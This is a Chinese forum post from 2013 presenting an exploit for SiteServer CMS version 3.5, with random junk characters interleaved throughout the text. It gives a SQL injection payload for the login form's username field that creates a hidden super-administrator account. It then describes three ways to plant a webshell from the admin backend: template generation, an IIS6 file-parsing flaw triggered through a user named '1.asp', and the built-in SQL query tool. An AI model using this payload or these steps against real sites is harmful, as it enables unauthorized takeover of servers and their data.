经测试秒杀最新的3.5版
' ~2 r& o9 h/ Q2 v6 l3 v5 Rstieserver官网:www.siteserver.cn i$ |: z* h9 B" N8 z9 k0 j
EXP:; f8 @) l/ j- b' m0 ~; w) E0 ?
直接访问UserCenter/login.aspx
a: p- Y( w/ o' f. L6 I! F0 W用户名处输入:1 ?0 ] c% ]; m- |# ?6 ]
9 @" a9 }3 Z3 Z3 O5 n123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–) s6 w7 q% N* k8 `. j! i; U( k
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。0 H7 u" K; o" E$ Y, f
之后再访问后台SiteServer/login.aspx用插入的用户登陆
- q( q- a5 w3 K$ m, I9 h. F3 u+ E) B后台拿webshell的三种方法:
$ h$ ^, o0 t. L1 u3 X) n9 [( W一、5 U) ~ `$ p x J+ i
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx/ `/ }2 e6 u8 O! i( Z
二、0 X0 x" h( l4 J/ N& u
成员权限-》添加用户-》用户名为:1.asp( a6 X! _# N1 k8 S* [
http://127.0.0.1/usercenter/
/ g# }4 {% `: s5 v5 {; G- Z8 P用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
6 D3 L" l- }* |, _( Y" w(ps:后台添加用户时不会验证是否含有非法字符)- E" [2 w1 d! P% o+ `
三、
7 i9 p! K' ^6 o& m1 A% s系统工具-》实用工具-》机器参数查看$ f+ D3 b$ u( ]6 ?! z
可以看到数据库类型、名称,WEB路径
0 k/ {8 K p0 x系统工具-》数据库工具-》SQL语句查询" l2 O6 R: Q+ g, U5 A: l8 n
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对